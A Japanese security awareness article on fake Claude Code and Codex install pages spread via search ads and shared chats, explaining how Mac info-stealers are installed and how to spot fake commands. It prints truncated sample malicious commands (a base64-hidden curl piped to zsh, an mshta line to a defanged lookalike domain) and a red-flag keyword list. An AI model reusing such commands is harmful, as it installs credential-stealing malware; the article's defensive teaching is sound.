「検索して、コピペしただけ」で感染する|偽のClaude Code・Codexインストール手順とClickFix、Macを守る見分け方【2026年】

💻 2026年10月 Mac・開発者・AIツール利用者へ

「検索して、コピペしただけ」で感染する

偽のClaude Code・Codexのインストール手順と、ClickFixの手口。
ダウンロードも、脆弱性もいらない。必要なのは、あなたの「貼り付け」だけです。

🍎 macOS ⌨️ ターミナル 🔎 検索広告 🤖 Claude Code・Codex
🚨 先に結論

「Claude Code インストール」「codex mac download」と検索すると、本物より上に表示された広告から、本物そっくりのインストール案内に誘導される攻撃が2026年に入って続いています。案内どおりターミナルにコマンドを貼り付けて実行すると、パスワードやキーチェーン、暗号資産ウォレット、開発用の鍵を盗むマルウェアがMacに入ります。
やっかいなのは、本物のインストール手順も「コマンドを貼って実行」という同じ形をしていることです。見分けるポイントは、どこから取ってくるか(ドメイン)と、行き先を隠していないかの2つ。
今日からは、インストール手順は検索広告からではなく、公式ドキュメントのブックマークから開くことにしてください。

01

📣 Xで話題になった「広告1位からの感染」

「脆弱性もダウンロードもない。あるのはGoogle広告とChatGPTのページへの信頼だけ」

海外のセキュリティ研究者の投稿(2026年8月10日・英語/要約)

「codex macbook download」とGoogleで検索した。1番上はスポンサー広告で、リンク先は本物のchatgpt.com。開くと共有されたChatGPTのチャットがあり、親切なインストール手順が書いてある。「ターミナルを開いて、このコマンドを貼ってください」。
そのコマンドには、base64という形式で隠された文字列が入っていた。元に戻すと、行き先は既知の攻撃用サイトで、Mac用の情報窃取マルウェア(MacSync Stealer)を落とすものだった。パスワードも、キーチェーンも、暗号資産ウォレットも、全部持っていかれる。
脆弱性も、ダウンロードもない。Google広告とChatGPTのページを信じただけで、自分で自分を感染させる。広告や共有チャットのコマンドは、絶対にターミナルに貼らないで。

♥ 約1,200🔁 約200👁 約16万回表示 元の投稿を見る →

同じ時期、Xでは関連する報告が相次いで共有されていました。

8月6日|Microsoft

「本物のMacの人にだけ」罠を見せる

Microsoftの脅威調査チームは、Mac向けの偽インストール案内が、訪問者がふつうのMacのブラウザかどうかを調べてから罠を表示するように進化したと報告。調査用の自動ツールには、何も見せないのです。

7月5日

Xの「認証済み」広告からも

MacBookのノッチを便利にする人気ツールに見せかけたX上の広告が、そっくりな偽ドメインに誘導し、「ターミナルを開いて…」と指示していた、という報告もありました。

10月1日|ANY.RUN

Claude・DeepSeek・ChatGPTのふりをして

解析サービスのANY.RUNは、AIツールを装った偽ダウンロードページ、偽インストーラー、コマンドを貼らせる手口、さらに本物の共有チャットを使う攻撃が「今まさに活発」だと警告しました。

🧭

この記事で扱う範囲

Windowsの「Win+R」を押させる偽のCAPTCHA(「私はロボットではありません」の画面)については、サポート詐欺とClickFix攻撃の記事でやさしく解説しています。この記事では、Macのターミナルと、開発者向けAIツールの「インストール手順」を装う手口に絞ります。

02

🗺️ まずこの1枚:検索から感染まで

どの段階も「いつもの作業」に見えるのが、この手口の怖さです。

🔧 「Claude Code インストール」と検索してから、Macの中身を盗まれるまで

ここまでは「いつものインストール作業」に見える ① 検索する 「claude code install」 「codex mac download」 ② 1位の広告 本物の公式サイトより 上に表示される ③ そっくりな手順 偽サイト、または本物の ドメイン上の共有ページ ④ ターミナルに 貼って実行 行き先は隠されている ⚠ Enterを押したら、もう本番 ⑤ 偽の確認画面 「システム設定」を装って Macのパスワードを聞く ⑥ 鍵束ごと送り出す 🔑 キーチェーン 🌐 ブラウザのパスワード・Cookie 💰 暗号資産ウォレット 🧑‍💻 SSH鍵・AWSの認証情報 ✈️ Telegramのログイン状態 止められるのは ②(広告を押さない)と ④(貼る前に行き先を確かめる) ⑤で突然Macのパスワードを聞かれたら、入力せずに止めるのも最後の防衛線

この手口には、ファイルのダウンロードも、OSの弱点(脆弱性)を突く攻撃も出てきません。あなたが自分でターミナルにコマンドを貼り、Enterを押す。それだけで、マルウェアが外から取り寄せられて動き出します。

セキュリティ企業のPush Securityは、この「インストール手順」に化ける型をInstallFix(インストールフィックス)と名づけました。偽のエラー画面やCAPTCHAで「直すにはこれを貼って」と言う従来のClickFixと違い、口実はいらない。利用者はもともと、そのソフトを入れたくて手順を探しているからです。

03

🚪 たとえると「警備員のいない通用口」

Macの安全装置は、なぜこの手口に反応しないのか。

🏬

正面玄関には警備員。でも、オーナーが通用口から運び込んだ荷物は?

Macには、ネットから届いたアプリを正面玄関で確かめる警備員(Gatekeeper:開発元の署名やAppleの確認を調べる仕組み)がいます。ブラウザでダウンロードしたアプリには「ネットから来た荷物」という札が付き、警備員が中身を確かめます。
ところがターミナルのコマンドは、オーナーであるあなたが、通用口から自分で荷物を運び込むようなものです。ターミナルで取り寄せたファイルにはこの札が付かないことが多く、警備員の目を通らずに中に入ってしまいます。

入り方Macの警備員(Gatekeeper)攻撃者から見ると
ブラウザでアプリをダウンロード確認する。署名がない・Appleの確認がないと警告警告を突破させる手間がかかる
App Storeから入れるAppleの審査を通ったものだけほぼ入り込めない
ターミナルにコマンドを貼る多くの場合、確認の対象にならない利用者さえ説得できれば通る
💡

だから攻撃者は「説得」に全力を注ぐ

警備員をだますより、オーナーを説得するほうが簡単です。検索広告で1位に出し、本物そっくりのページを作り、本物のドメインの共有ページまで使うのは、すべて「あなたに通用口を開けさせる」ためです。

※ たとえは分かりやすさを優先しています。実際には、コマンドで取り寄せたファイルにも別の仕組みで確認がかかる場合があり、逆にマルウェア側がこの札を消す命令を混ぜることもあります。

04

📰 実際に起きたこと:2026年の4つの報告

3月から8月にかけて、手口はどんどん本物に近づいていきました。

3月

Push Security「InstallFix」:Claude Codeの公式ページを丸ごとコピー

「Claude Code install」「Claude Code CLI」の検索にGoogle広告を出し、ロゴもレイアウトもそっくりな偽のインストールページへ。Mac用の手順はもちろん、Windows用(PowerShell・コマンドプロンプト)の手順も偽物で、Windowsでは情報窃取マルウェアのAmatera Stealerが入りました。偽ページはCloudflare PagesやSquarespaceなど、ふつうのWebサービスの上に置かれていました。Push Securityによると、同社が止めたClickFix系の罠の5件に4件は検索エンジン経由。メールのセキュリティを完全に素通りする入口です。

5月

ReliaQuest:ClickFixが侵入手口の約15%に。Macにも初めて

セキュリティ企業ReliaQuestは、2026年3〜5月に調べた事案で、ClickFixが最初の侵入の14.9%を占め、この期間に初めてMacでも確認されたと報告しました。Macでは、ターミナルの代わりに「スクリプトエディタ」を開かせる型も使われています。

7月

Huntress:「MacにClaude Codeを入れる方法」で検索した人が感染

Google広告から開いたのは、本物のclaude.ai上に公開された共有会話で、表示名は「Apple Support」。そこに書かれたコマンドを貼ると、6段階の仕掛けが動き出しました。偽の「システム設定」画面でMacのパスワードを聞き出し、キーチェーン、ブラウザのCookieと保存パスワード、SSH鍵、AWSの認証情報、Telegramのログイン状態、暗号資産の復元フレーズを盗みます。さらに、Ledgerなどのウォレットアプリ本体を改ざんし、次に起動したときに偽のエラー画面で復元フレーズを入力させる仕掛けまで入っていました(MacSync Stealer)。

8月

Cato Networks:偽のCodexが「本物のOpenAIより上」に

「codex macos download」などの検索で、本物のOpenAIの検索結果より上に広告を表示。誘導先はGoogleサイトで作られたCodexのダウンロード画面で、ターミナルに貼るコマンドは一見ふつうのCodexのインストール行に見えるものでした。中身はbase64で隠した行き先からスクリプトを取ってきて実行し、Mac用の情報窃取マルウェア(AMOSに似たもの)を入れます。同じ仕組みでClaude Codeを装うページも見つかっています。

🚨 「本物のドメインだから安全」が崩れた

7月と8月の例では、罠のページがclaude.ai、chatgpt.com、Googleサイトといった、誰もが信頼するドメインの上にありました。どれも「利用者が自由にページを作って公開・共有できる」機能を悪用したものです。URLが本物でも、書いた人が本物とは限りません。同じ7月には、claude.ai上の公開ページを偽のClaudeデスクトップアプリのダウンロード画面に仕立て、少なくとも29の組織に被害を出した例もありました(AIのログイン状態が盗まれる記事で紹介しています)。

Microsoftは8月、こうしたMac向けの罠のページが250以上のドメインに広がり、訪問者のブラウザを調べて「本物のMac利用者」にだけ罠を見せるようになったと報告しています。セキュリティ企業の調査用ツールには、何の変哲もないページしか見えないため、発見が遅れます。

05

🔍 本物と偽物のコマンドを見比べる

形はそっくり。違うのは「どこから取ってくるか」と「隠していないか」。

まず知っておいてほしいのは、本物のインストール手順も、偽物と同じ形をしているということです。Claude CodeもCodexも、公式ドキュメントに「ターミナルにこのコマンドを貼ってください」と書いてあります。

📋 公式の手順(2026年10月6日に各公式ドキュメントで確認)

✅ Claude Code(macOS・Linux)

curl -fsSL https://claude.ai/install.sh | bash

✅ Codex CLI(macOS・Linux)

curl -fsSL https://chatgpt.com/codex/install.sh | sh

🚨 偽物の例(Push Securityが報告したMac用。途中は省略)

curl -ksfLS $(echo ‘aHR0cHM6…’|base64 -D)| zsh

🚨 偽物の例(同・Windows用)

C:\Windows\SysWOW64\mshta.exe https://claude.update-version[.]com/claude

※ 偽物のURLは誤ってアクセスしないよう [.] で区切っています。

コマンドを「部品」に分けて読む

部品意味本物偽物
curlネットからファイルを取ってくる使う使う
https://claude.ai/…取ってくる場所(いちばん大事)公式ドメインがそのまま読める読めない(隠されている)か、似せた別ドメイン
echo '…' | base64 -D暗号のような文字列を元に戻す使わない行き先を隠すために使う
-k(-ksfLSの k)通信相手の証明書の確認をしない使わない使うことがある
| bash/| sh/| zsh取ってきたものを、中身を見ずにすぐ実行使う使う
mshtaWindowsの古いHTML実行機能使わないWindows版で使う
⚠️

「| bash がある=危険」ではない。だから難しい

本物も偽物も、最後は「取ってきたものをすぐ実行する」形です。見分けの決め手は、①取ってくる場所が、はっきり公式ドメインと読めるか、②その場所が隠されていないかの2つしかありません。逆に言えば、行き先が読めないコマンドは、それだけで貼らない理由になります。

貼る前に止まるべき「危険信号」の言葉

🔴 行き先を隠す

  • base64、echo '…' |
  • 読めない長い英数字の塊

🔴 安全確認を外す

  • curl -k、--insecure
  • xattr -c、xattr -d com.apple.quarantine(「ネットから来た」札をはがす)

🟡 Macで要注意

  • osascript(AppleScriptの実行)
  • /tmpへの保存とchmod +x
  • sudo(管理者として実行)

🟡 Windowsで要注意

  • mshta、-enc
  • iwr/irm と iex の組み合わせで、行き先が公式でないもの
  • -WindowStyle Hidden
06

🍎 Macの守りと、その抜け道

Appleも対策を始めています。ただし、万能ではありません。

macOS Tahoe 26.4(2026年3月30日)

ターミナルの「貼り付け警告」

Appleは macOS Tahoe 26.4 で、ブラウザなどから危険そうなコマンドをターミナルに貼り付けると、実行を止めて警告を出す仕組みを加えました。「まだ実行されていないので被害はない」「詐欺師はこうした指示をWebサイトなどで配っている」といった内容で、貼り付けを取り消すか、続けるかを選べます。

ただし

警告には限界がある

この機能はリリースノートに載っておらず、どんなコマンドを危険と判断するかも公開されていません。利用者の報告では、警告は1回のターミナルの起動につき1回だけで、すべての危険なコマンドを拾うわけではないようです。また、ReliaQuestが報告したように、ターミナルではなくスクリプトエディタを開かせる型には、この警告は関係しません。

🔐

コマンドを貼った直後に「パスワードを入力」が出たら、入れない

HuntressやMicrosoftが解析したマルウェアは、実行後に「システム設定」などを装った画面でMacのログインパスワードを聞き出し、それを使ってキーチェーン(パスワードの保管庫)を開けていました。Webページの手順で何かを貼ったあとに出てきたパスワード入力は、入れずにキャンセルし、9章の手順に進んでください。

✅ まずはmacOSを最新に

貼り付け警告は万能ではありませんが、最後に一度立ち止まらせてくれる仕組みです。macOS Tahoe 26.4より前のバージョンを使っている場合は、アップデートしておきましょう(Appleメニュー →「システム設定」→「一般」→「ソフトウェアアップデート」)。そして、警告が出たら迷わず取り消す。それが警告の正しい使い方です。

07

🧑‍💻 なぜ開発者が狙われるのか

「コマンドを貼る習慣」と「PCの鍵束」の両方を持っているから。

Push Securityは、開発者は「curlで取ってきてbashで実行」という手順に慣れていると指摘しています。Homebrew(Mac用のソフト管理ツール)もRustも、公式の入れ方がこの形だからです。そして、この形の安全性は結局「そのドメインを信じられるか」だけにかかっています。そっくりなページが効くのは、そのためです。

しかも開発者のPCには、ふつうのPCよりずっと多くの「鍵」があります。

開発者のMacにある鍵盗まれると関連記事
SSH鍵サーバーやGitHubに本人として入られる-
AWSなどクラウドの認証情報会社のクラウドを操作・課金されるAPIキーの置き忘れ
AIサービスのログイン状態・APIキーチャット履歴を読まれ、利用料を使われるAIのログイン状態
暗号資産ウォレット資産をそのまま送金される-
ブラウザに保存した社内システムのパスワード会社のシステムに入られる偽の採用面接
🔗

「動かして」と「貼って」は同じ罠

偽の採用面接で「このリポジトリを動かして」と頼む手口と、偽のインストール手順で「このコマンドを貼って」と頼む手口は、根っこが同じです。知らない人が用意したものを、自分の大事なPCで実行させる。入口が「就職」か「便利なツール」かの違いだけです。

08

🩺 あなたは大丈夫? 診断とクイズ

当てはまる数で、いまの危なさを確かめましょう。

  • ソフトのインストール方法を、検索結果の1番上から開くことが多い
  • 検索結果の「スポンサー」「広告」の表示を気にしたことがない
  • Webページのコマンドを、中身を読まずにターミナルに貼ったことがある
  • 「AIツールの入れ方」を、ブログや共有チャット、動画の説明欄から真似したことがある
  • macOSのバージョンが Tahoe 26.4 より前のまま
  • コマンドを貼ったあとに出たパスワード入力に、深く考えず入力したことがある
  • このMacに、SSH鍵やクラウドの認証情報、暗号資産ウォレットがある
  • 仕事用のMacで、個人的に試したいツールも入れている

🟢 0〜2個

  • 良い習慣です。9章の「ブックマーク化」だけ

🟡 3〜5個

  • 次の新ツールで引っかかる可能性。貼る前の確認を習慣に

🔴 6個以上

  • 心当たりのあるコマンドがあれば、9章の「貼ってしまったら」を

クイズ:どれを貼る?

Q1. 「claude code install」の検索結果。1位の広告のページにあったのはどれ? 貼っていいのは?

  1. curl -fsSL https://claude.ai/install.sh | bash
  2. curl -ksfLS $(echo 'aHR0cHM6Ly9…'|base64 -D)| zsh
  3. curl -fsSL https://claude-ai-install.com/install.sh | bash
答えを見る

貼っていい可能性があるのは1だけ。2は行き先をbase64で隠しているうえ、証明書の確認を外す -k もあります。3は公式ドメイン(claude.ai)ではなく、似せた別のドメインです。ただし、1が書いてあってもそのページ自体が偽物なら、別の場所に罠があるかもしれません。いちばん安全なのは、広告のページで判断せず、公式ドキュメントを自分で開いてコピーすることです。

Q2. chatgpt.com の共有チャットに「Codexの入れ方」が書いてあった。信じていい?

  1. chatgpt.com なので公式の情報
  2. 誰でも作れる共有ページなので、公式とは限らない
  3. AIが書いたものなので正確
答えを見る

正解は2。共有チャットは、誰でも作って公開できます。8月にXで報告された事例では、まさにchatgpt.comの共有チャットが罠の手順書として使われていました。公式の手順は、OpenAIの公式ドキュメントにあります。

Q3. コマンドを貼った直後に「システム設定がパスワードを求めています」と出た

  1. Macの正規の画面なので入力する
  2. 入力せずにキャンセルし、ネットを切る
  3. 一度だけなら入力しても大丈夫
答えを見る

正解は2。解析されたMac用の情報窃取マルウェアは、偽の確認画面でパスワードを聞き出し、キーチェーンを開けていました。直前にWebのコマンドを実行していたなら、偽物を疑うのが先です。

09

🛡️ 今日やること/貼ってしまったら

習慣を3つ変えるだけで、この手口のほとんどは防げます。

今日やること①

公式ドキュメントをブックマークする

よく使うツールの公式のインストール手順のページをブックマークし、次からはそこから開きます。検索するなら、「スポンサー」「広告」と付いた結果は飛ばします。広告の1位が本物とは限りません。

今日やること②

貼る前に「行き先」を声に出して読む

コマンドの中の https://… を読み上げて、公式ドメインと一致するか確かめます。行き先が読めない(base64などで隠れている)なら、その時点で貼らない。迷ったら、Homebrewなどのパッケージ管理ツールで公式の名前を指定して入れる方法もあります。

今日やること③

macOSを更新し、警告では止まる

macOS Tahoe 26.4以降にして、ターミナルの貼り付け警告が出たら取り消す。コマンドのあとに出たパスワード入力には、入力しない。この2つの「止まる場所」を覚えておきます。

もし、貼って実行してしまったら

1

🔌 すぐにネットを切る。パスワード入力が出ていたら入れない

Wi-Fiをオフにし、ケーブルを抜きます。盗んだ情報の送信には時間がかかることもあるので、「もう遅い」とあきらめずに、まず通信を止めます。

2

📱 別の端末から、大事なアカウントを守る

Apple ID、メール、Google、AIサービス、GitHub、クラウドのパスワードを変え、すべての端末からログアウトします。感染したMacでは操作しないこと。

3

🔑 開発用の鍵を作り直す

SSH鍵、AWSなどのアクセスキー、GitHubのトークン、AIのAPIキーを無効にして作り直します。会社の鍵があれば、すぐに情報システム担当へ。

4

💰 暗号資産は別の端末で新しいウォレットへ

復元フレーズが盗まれた前提で、別の安全な端末で新しいウォレットを作り、資産を移します。ウォレットアプリ本体が改ざんされている可能性もあるので、感染したMacのウォレットアプリは使わないでください。

5

💾 データを退避して、macOSを入れ直す

このマルウェアは複数の段階で入り込み、遠隔操作の仕組みを残すこともあります。必要なデータだけ退避して、Macを初期化するのが確実です。

アカウントの守り方の全体像はアカウントを乗っ取られたら最初にやることで、ログアウトの効き目は「すべての端末からログアウト」は本当に効くのかで詳しく解説しています。

10

🏢 会社で開発ツールを配るとき

「各自で検索して入れてください」が、いちばん危ない。

項目🔴 危ない状態🟢 目指したい状態
導入方法社員が各自で検索してインストール社内ポータルやMDM(端末管理)から配布。手順は社内Wikiに公式リンク付きで
新しいAIツール話題になったら各自で試す試してよいツールと入れ方を情報システム部門が案内
Macの監視WindowsだけEDRを入れているMacにもEDR(不審な動きの監視)を入れ、ターミナル経由の不審な通信を検知
鍵の置き場所SSH鍵やクラウドの鍵がファイルのまま短命の認証やハードウェアキーを使い、PCに長期の鍵を置かない
報告「貼ってしまった」と言いにくい報告した人を責めない。早い報告ほど被害が小さい
📣

社内向けの一言

「ツールの入れ方は、検索ではなく社内Wikiから。ターミナルに貼るコマンドの行き先が読めなければ、貼る前に聞く。」──この2文を、開発チームの入社時の案内に入れておくだけでも効果があります。

11

🔬 専門家向けの詳細

報告された感染の流れとマルウェア。

報告誘導実行マルウェア
Push Security
(2026年3月)
Google広告。Claude Code・NotebookLMなどの偽インストールページ(Cloudflare Pages、Squarespace、Tencent EdgeOne)Mac:curl … $(echo …|base64 -D) | zsh
Win:mshta.exe
Win:Amatera Stealer/Mac:情報窃取型
Huntress
(2026年7月)
Google広告 → claude.ai上の共有会話(表示名「Apple Support」)curl → gzip+base64を埋め込んだzshローダー。6段階(AppleScriptの窃取、Mach-OのRAT、画面収録権限の奪取、ウォレットアプリ改ざん)MacSync Stealer
Cato Networks
(2026年8月)
「codex macos download」等の広告 → Googleサイト(iframeで中身を差し替え可能な3系統の基盤)base64で隠したURL → zshへパイプAMOS類似の情報窃取型
Microsoft
(2026年8月)
250以上の表向きドメイン。サーバー側でブラウザを判定し、本物のMacにだけ罠を表示難読化したコマンドをターミナルで実行MacSync、Atomic Stealer(AMOS)

守る側のポイント

  • メールゲートウェイでは検知できない(入口は検索広告)。ブラウザ側やDNSでの防御、類似ドメインの監視が有効
  • ターミナル・PowerShellから外部へ取りに行くcurl/iwrの直後に、osascriptやキーチェーンへのアクセス、/tmpからの実行が続く挙動を検知対象に
  • 罠のページは調査用クローラーには表示されないことがある(ブラウザのフィンガープリントで判定)。通報されたURLが「何もないページ」に見えても、安全とは限らない
  • macOS Tahoe 26.4の貼り付け警告は補助的な対策。スクリプトエディタ経由など別経路がある
12

❓ よくある質問・出典

迷いやすいところをまとめました。

Q. 日本語で「Claude Code インストール」と検索しても危ないですか?

報告されている事例の検索語は主に英語ですが、検索広告は国や言語をまたいで配信されることがあり、日本語で検索した場合だけ安全とは言い切れません。言語にかかわらず、広告ではなく公式ドキュメントから開くのが確実です。

Q. Homebrewで入れれば安全ですか?

公式のHomebrewから、公式の名前(例:brew install --cask claude-code)で入れるのは、Webページのコマンドを貼るより安全な方法のひとつです。ただし、Push SecurityはHomebrew自体のインストール手順を装った偽ページも確認しています。Homebrewを入れるときも、公式サイト(brew.sh)から手順を取ってください。

Q. Windowsは関係ないのですか?

関係あります。3月のInstallFixでは、Windows向けの偽手順(PowerShellやコマンドプロンプト)からAmatera Stealerが入りました。Windowsの「Win+R」型の偽CAPTCHAについては、サポート詐欺とClickFix攻撃の記事をご覧ください。

Q. AIに「このコマンドは安全?」と聞くのはありですか?

読み方の手助けにはなります。base64で隠された部分を元に戻してもらうと、行き先が見えることもあります。ただし、AIに聞くために自分のターミナルで実行してはいけません。文字としてそのまま貼り、最終的な判断は「行き先が公式ドメインか」で行ってください。

📚 出典・参考資料(2026年10月6日確認)

X投稿のいいね数・表示回数は2026年10月6日の取得時点の概数です。公式のインストールコマンドは変更されることがあるため、実際に入れるときは必ず公式ドキュメントを直接確認してください。

🔗 このサイトの関連記事

コメント